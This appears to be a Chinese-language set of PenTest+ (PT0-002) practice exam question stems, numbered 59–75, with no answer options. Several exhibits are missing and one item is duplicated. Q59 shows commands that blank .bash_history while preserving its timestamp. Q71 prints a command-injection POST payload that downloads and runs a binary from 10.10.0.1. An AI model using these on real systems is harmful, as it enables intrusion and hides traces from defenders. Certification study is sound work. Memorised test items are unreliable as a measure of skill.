类别 PT0-002

第 59 号 渗透测试人员进入系统并建立持久性，然后运行以下命令：
cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
测试员最有可能执行以下哪项操作？

NO.60 一名渗透测试人员在与客户接洽之前正在审查以下 SOW：
"网络图、逻辑和物理资产清单以及员工姓名应视为客户机密。任务完成后，渗透测试人员将通过加密协议向客户的首席信息安全官（CISO）提交调查结果，并随后以安全的方式删除所有调查结果"。根据 SOW 中的信息，以下哪些行为会被视为不道德？
(选择两个）。

第 61 号 某公司担心其云服务提供商未能充分保护其软件开发的虚拟机。这些虚拟机位于一个数据中心内，与其他公司共享物理资源。该公司最担心以下哪种攻击类型？

第 62 号 一名渗透测试人员希望识别可被用来在运行了 SSHD 的 Linux 服务器上执行的 CVE。以下哪项最能支持这项任务？

NO.63 输出结果如下
用户代理：*
禁止：/author/
禁止：/xmlrpc.php
禁止：/wp-admin
禁止：/page/
该产出最有可能是在以下哪项活动中获得的？

NO.64 渗透测试人员希望通过在目标和具有 FTP 协议的服务器之间部署工作站作为路径上攻击来获取 FTP 凭据。以下哪种方法是实现这一目标的最佳方法？

第 65 号 渗透测试人员对客户的关键服务器进行了漏洞扫描，发现了以下问题：

以下哪项是补救建议？

NO.66 一家公司获得了云服务提供商的漏洞扫描许可，现在希望测试其托管数据的安全性。
为评估该风险，测试人员应首先验证以下哪项？

NO.67 渗透测试人员以用户身份登录某公司的云环境。以下哪个 Pacu 模块能让测试人员确定现有用户的访问级别？

NO.68 一名渗透测试人员获得了一台基于 Linux 的文件服务器的 root 访问权限，并希望在重启后保持持久性。以下哪种技术能最好地支持这一目标？

第 69 号 渗透测试人员受聘审查无线安全。测试人员部署了一个恶意无线接入点，模仿目标企业 WiFi 的配置。现在，渗透测试员想尝试强制附近的无线站连接到恶意 AP。接下来，测试人员应采取以下哪些步骤？

NO.70 一名渗透测试人员在与客户接洽之前正在审查以下 SOW：
"网络图、逻辑和物理资产清单以及员工姓名应视为客户机密。任务完成后，渗透测试人员将通过加密协议向客户的首席信息安全官（CISO）提交调查结果，并随后以安全的方式删除所有调查结果"。
根据 SOW 中的信息，以下哪些行为会被视为不道德？(请选择两项）。

第 71 号 一名渗透测试人员利用漏洞进入了一个系统。以下是使用的代码片段：
exploit = "POST "
exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} –
c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a”
exploit += "HTTP/1.1"
渗透测试人员应在接触后运行以下哪些命令？

第 72 号 您是一名渗透测试人员，正在对服务器进行端口扫描。
说明
第 1 部分：给定输出结果，根据可用选项构建生成该输出结果的命令。
第 2 部分：适当构建命令后，使用给定的输出确定应进一步调查的潜在攻击载体。
如果您想恢复模拟的初始状态，请点击 "全部重置 "按钮。

第 73 号 渗透测试人员在一台 Windows 服务器上运行了以下命令：

在提交最终报告后，测试员应做以下哪项工作？

第 74 号 渗透测试人员的任务是攻击 192.168.1.0/24 范围内的一系列目标，尽可能少地触发警报和反措施。
下列哪种 Nmap 扫描语法能最好地实现这一目标？

第 75 号 一名正在进行网络应用程序测试的渗透测试人员发现了一个与金融数据登录页面相关的点击劫持漏洞。